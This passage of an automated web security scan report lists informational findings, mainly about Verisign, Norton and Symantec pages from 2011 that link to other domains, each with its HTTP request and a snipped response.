https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

GET /support/mpki-for-ssl-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:45:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
Windows Mobile Sign In</a>
...[SNIP]...

14.19. https://knowledge.verisign.com/support/mpki-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.com/support/mpki-support/index.html?tid=gnsupport

The response contains the following links to other domains:

https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

GET /support/mpki-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
Windows Mobile Sign In</a>
...[SNIP]...

14.20. https://knowledge.verisign.com/support/ssl-certificates-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/ssl-certificates-support/index

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false

The response contains the following links to other domains:

https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
Windows Mobile Sign In</a>
...[SNIP]...

14.21. https://knowledge.verisign.com/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/ssl-certificates-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.com/support/ssl-certificates-support/index.html?tid=gnpsupport

The response contains the following links to other domains:

https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

GET /support/ssl-certificates-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
Windows Mobile Sign In</a>
...[SNIP]...

14.22. https://knowledge.verisign.com/support/trust-seal-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/trust-seal-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.com/support/trust-seal-support/index.html?tid=gnpsupport

The response contains the following links to other domains:

https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

GET /support/trust-seal-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
Windows Mobile Sign In</a>
...[SNIP]...

14.23. https://onlinefamily.norton.com/familysafety/loginStart.fs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlinefamily.norton.com
Path:	/familysafety/loginStart.fs

Issue detail

The page was loaded from a URL containing a query string:

https://onlinefamily.norton.com/familysafety/loginStart.fs?inid=us_2010June_NOF

The response contains the following links to other domains:

https://www.facebook.com/norton?locale=en_US
https://www.facebook.com/plugins/like.php?href=https%3A//www.facebook.com/norton&layout=button_count&show_faces=false&send=false&action=like&font&colorscheme=light&ref=NortonOnlineFamily&locale=en_US

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:55 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/
Set-Cookie: formVersion=1315604755623; Path=/
Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 37906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <
...[SNIP]...
<div id="norton-on-facebook" style="font-size:11px;">
       <a href="https://www.facebook.com/norton?locale=en_US" style="color:#3B5998; font-size:11px; float:left;" target="_blank"><strong>
...[SNIP]...
</div>
       <iframe src="https://www.facebook.com/plugins/like.php?href=https%3A//www.facebook.com/norton&layout=button_count&show_faces=false&send=false&action=like&font&colorscheme=light&ref=NortonOnlineFamily&locale=en_US" scrolling="no" frameborder="0" style="border:none; overflow:hidden; padding-top:5px; height:22px; width:150px;" allowTransparency="true"></iframe>
...[SNIP]...

14.24. http://player.ooyala.com/player.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.ooyala.com
Path:	/player.js

Issue detail

The page was loaded from a URL containing a query string:

http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent

The response contains the following link to another domain:

http://www.adobe.com/go/getflash/

Request

GET /player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:25:08 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-afd1a3c3
X-Pad: avoid browser bug
Content-Length: 26306
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:10 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
<td align="center"><a href="http://www.adobe.com/go/getflash/" style="color:white"><span style="font-size:12px">
...[SNIP]...

14.25. http://query.verisign.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend

The response contains the following links to other domains:

http://verisign.ch/assets/shared/images/sm_004276_oo.gif
http://www.symantec.com/
http://www.verisign.be/
http://www.verisign.ch/
http://www.verisign.ch/code-signing/index.html
http://www.verisign.ch/contact-information/index.html?tid=footer
http://www.verisign.ch/corporate/index.html?tid=footer
http://www.verisign.ch/legal-notices/index.html?tid=footer
http://www.verisign.ch/privacy/index.html?tid=footer
http://www.verisign.ch/repository/index.html?tid=footer
http://www.verisign.ch/site-map/index.html?tid=footer
http://www.verisign.ch/ssl/index.html
http://www.verisign.ch/ssl/ssl-information-center/ev-ssl-certificate/index.html
http://www.verisign.ch/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.ch/ssl/ssl-information-center/index.html
http://www.verisign.ch/trust-seal/index.html
http://www.verisign.ch/trust-seal/resources/malware-faq/index.html
http://www.verisign.de/
http://www.verisign.dk/
http://www.verisign.es/
http://www.verisign.fr/
http://www.verisign.in/
http://www.verisign.it/
http://www.verisign.se/
http://www.verisignchina.com.cn/
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:07 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 52678

<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="c
...[SNIP]...
<li><a href="http://www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="http://www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="http://www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="http://www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="http://www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="http://www.verisign.in/">India</a>
...[SNIP]...
<li><a href="http://www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="http://www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="http://www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="http://www.verisign.ch/">Switzerland</a>
...[SNIP]...
<noscript>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0"
id="s_s" align="" height="72" width="100">
<param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=query.verisign.com&lang=en">
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft Windows Mobile
Sign In</a>
...[SNIP]...
<li><a href='//www.verisign.ch/contact-information/index.html?tid=footer'>Contact Us</a></li><li><a href='//www.verisign.ch/corporate/index.html?tid=footer'>About
Us</a>
...[SNIP]...
<li><a href='//www.verisign.ch/legal-notices/index.html?tid=footer'>Legal
Notices</a>
...[SNIP]...
<li><a href='//www.verisign.ch/privacy/index.html?tid=footer'>Privacy</a></li><li><a href='//www.verisign.ch/repository/index.html?tid=footer'>Repository</a>
...[SNIP]...
<li><a href='//www.verisign.ch/site-map/index.html?tid=footer'>Site
Map</a>
...[SNIP]...
<a href='javascript:O_LC();'><img
src='//verisign.ch/assets/shared/images/sm_004276_oo.gif' alt='Feedback' style='margin-right:5px;' />Feedback</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
(NASDAQ: SYMC), provides solutions that allow companies and consumers to engage in communications and commerce online with
confidence. VeriSign Authentication Services include <a href='//www.verisign.ch/ssl/ssl-information-center/index.html'>SSL</a>,
<a href='//www.verisign.ch/ssl/index.html'>SSL Certificates</a>, <a href='//www.verisign.ch/ssl/ssl-information-center/ev-ssl-certificate/index.html'>Extended
Validation</a> (<a href='//www.verisign.ch/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html'>EV
SSL</a>), <a href='//www.verisign.ch/trust-seal/index.html'>VeriSign Trust Seal</a>
...[SNIP]...
</a>, <a href='//www.verisign.ch/trust-seal/resources/malware-faq/index.html'>malware scan</a>, <a href='//www.verisign.ch/code-signing/index.html'>code
signing</a>
...[SNIP]...

14.26. http://searchg.symantec.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchg.symantec.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1

The response contains the following link to another domain:

http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1

Request

GET /search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1 HTTP/1.1
Host: searchg.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622035736-New%7C1336358035736%3B%20event69%3Devent69%7C1336358035737%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:03 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
x-content-type-options: nosniff
Vary: Accept-Encoding
Content-Length: 36924
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

<script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en
...[SNIP]...
<b><a onclick="TrackSSOB(this, 'symsugg')" href="http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1">Norton Protection Weblog<br>
...[SNIP]...

14.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/outsideSearch

Issue detail

The page was loaded from a URL containing a query string:

https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP

The response contains the following link to another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:33 GMT
Content-type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=OqJ5OZYQ2WaOK1XBACbZvE969n6D9cN3GA67zeaCICg9DN3y5YkW!-1800460983; path=/
Connection: close

<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8"/>
<title>

Search for SSL or Code Signing Certificates from VeriSig
...[SNIP]...
<body aLink=#000000 bgColor=#ffffff class=bgWht leftMargin=0 link=#000000 topMargin=0 vLink=#000000 marginheight="0" marginwidth="0" onLoad="focus()">

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

14.28. http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.symantecstore.com
Path:	/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200

Issue detail

The page was loaded from a URL containing a query string:

http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200?inid=us_hhobanner_norton_greenpc

The response contains the following link to another domain:

http://buy.norton.com/domain_migration?inid=us_hhobanner_norton_greenpc

Request

GET /store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200?inid=us_hhobanner_norton_greenpc HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_norton_greenpc
Content-Length: 279
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_norton_greenpc">here</a>
...[SNIP]...

14.29. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.symantecstore.com
Path:	/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq

Issue detail

The page was loaded from a URL containing a query string:

http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq?inid=us_hhobanner_nortongiftguide2008

The response contains the following link to another domain:

http://buy.norton.com/domain_migration?inid=us_hhobanner_nortongiftguide2008

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq?inid=us_hhobanner_nortongiftguide2008 HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_nortongiftguide2008
Content-Length: 284
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_nortongiftguide2008">here</a>
...[SNIP]...

14.30. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.symantecstore.com
Path:	/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/

Issue detail

The page was loaded from a URL containing a query string:

http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/?inid=us_hhobanner_earth_day

The response contains the following link to another domain:

http://buy.norton.com/domain_migration?inid=us_hhobanner_earth_day

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/?inid=us_hhobanner_earth_day HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_earth_day
Content-Length: 274
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_earth_day">here</a>
...[SNIP]...

14.31. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.symantecstore.com
Path:	/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/

Issue detail

The page was loaded from a URL containing a query string:

http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/?inid=us_hho_homepage_hero_mac2010lp

The response contains the following link to another domain:

http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_mac2010lp

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/?inid=us_hho_homepage_hero_mac2010lp HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_mac2010lp
Content-Length: 282
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_mac2010lp">here</a>
...[SNIP]...

14.32. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.symantecstore.com
Path:	/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/

Issue detail

The page was loaded from a URL containing a query string:

http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/?inid=us_hhobanner_2year

The response contains the following link to another domain:

http://buy.norton.com/domain_migration?inid=us_hhobanner_2year

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/?inid=us_hhobanner_2year HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_2year
Content-Length: 270
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_2year">here</a>
...[SNIP]...

